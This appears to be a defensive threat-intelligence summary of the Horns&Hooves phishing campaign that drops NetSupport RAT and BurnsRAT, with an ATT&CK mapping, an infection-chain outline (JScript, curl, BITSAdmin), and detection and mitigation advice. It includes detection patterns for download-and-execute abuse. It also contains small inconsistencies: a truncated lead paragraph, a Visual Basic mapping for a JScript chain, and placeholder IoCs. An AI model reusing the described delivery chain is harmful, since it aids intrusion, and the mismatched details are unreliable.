Full Report
A newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT. The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer
Analysis Summary
# Tool/Technique: Horns&Hooves Campaign
## Overview
The Horns&Hooves campaign is a newly discovered malware operation primarily targeting private users, retailers, and service businesses in Russia since approximately March 2023. Its primary goal is to establish initial access using RATs (NetSupport RAT, BurnsRAT) which can then be leveraged to deploy secondary stealer malware like Rhadamanthys or Meduza.
## Technical Details
- Type: Campaign / Phishing Delivery Mechanism
- Platform: Windows (implied by use of JScript, BITSAdmin, curl, NSIS installer)
- Capabilities: Phishing delivery via malicious ZIP archives containing JScript, multi-stage execution, remote access trojan deployment, secondary malware installation.
- First Seen: Around March 2023
## MITRE ATT&CK Mapping
*Note: Mappings are based on the described execution chains and delivery mechanisms.*
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- **TA0002 - Execution**
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1059.005 - Command and Scripting Interpreter: Visual Basic
- T1204.002 - User Execution: Malicious File
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (Implied by RAT C2 communication)
## Functionality
### Core Capabilities
- Delivery of malicious payloads (JScript) disguised as business documents (requests, bids) inside ZIP archives.
- Multi-stage execution involving JScript downloading and executing further payloads via Windows utilities.
- Use of `curl` to download a decoy image (PNG) while simultaneously retrieving and executing `bat_install.bat`.
- Reliance on `BITSAdmin` to stealthily fetch and run subsequent files, including the final RAT payloads.
### Advanced Features
- Active development of the JavaScript payload, demonstrating evolving delivery techniques (e.g., mimicking legitimate libraries like Next.js).
- Payload obfuscation/disguise, sometimes including decoy organizational documents within the ZIP archive to increase user trust.
- Two distinct RAT deployment paths observed: direct drop of NetSupport RAT or dropping an NSIS installer to deploy BurnsRAT.
- Direct injection of the NetSupport RAT payload within the JavaScript code in later variants.
## Indicators of Compromise
*Note: Specific IoCs were not provided beyond tool names; generic indicators based on the description are listed.*
- File Hashes: [Not specified in the context]
- File Names: JScript files disguised as business communication, `bat_install.bat`, Decoy PNG image name (unknown).
- Registry Keys: [Not specified in the context]
- Network Indicators: C2 servers for NetSupport RAT/BurnsRAT communication (defanged).
- Behavioral Indicators: Execution of `BITSAdmin` or `curl` initiated by a JScript runtime environment; NSIS installer execution; processes communicating with C2 associated with remote administration tools.
## Associated Threat Actors
- TA569 (also known as Gold Prelude, Mustard Tempest, Purple Vallhund)
- Note: Known for operating SocGholish (FakeUpdates) and acting as an Initial Access Broker (IAB) for ransomware like WastedLocker.
## Detection Methods
- Signature-based detection: Signatures for the identified RAT executables (NetSupport RAT, BurnsRAT) and stealer malware (Rhadamanthys, Meduza).
- Behavioral detection: Monitoring for JScript execution that invokes system utilities like `BITSAdmin` or `curl` to download and execute remote files, especially when packaged within ZIP archives. Monitoring for remote administration service initiation (RMS/NetSupport).
- YARA rules: Applicable for recognizing custom initial JavaScript loaders or specific characteristics of the deployed RATs.
## Mitigation Strategies
- Prevention measures: Email gateway filtering aggressive scrutiny of ZIP files containing scripts (JScript/JS). Content inspection of script attachments.
- Hardening recommendations: Disable or restrict the use of `BITSAdmin` for non-standard network activity. Implement strong application control policies to restrict execution from common user data paths. Ensure all software (especially OS components and parsing engines) are fully patched to prevent zero-day exploitation that might bypass the described execution chain.
- Network monitoring for C2 beaconing associated with RATs.
## Related Tools/Techniques
- NetSupport RAT (Primary initial access payload)
- BurnsRAT (Alternative initial access payload)
- Rhadamanthys (Secondary stealer malware)
- Meduza (Secondary stealer malware)
- Remote Manipulator System (RMS) (Used in conjunction with BurnsRAT deployment)
- SocGholish / FakeUpdates (Associated threat actor activity)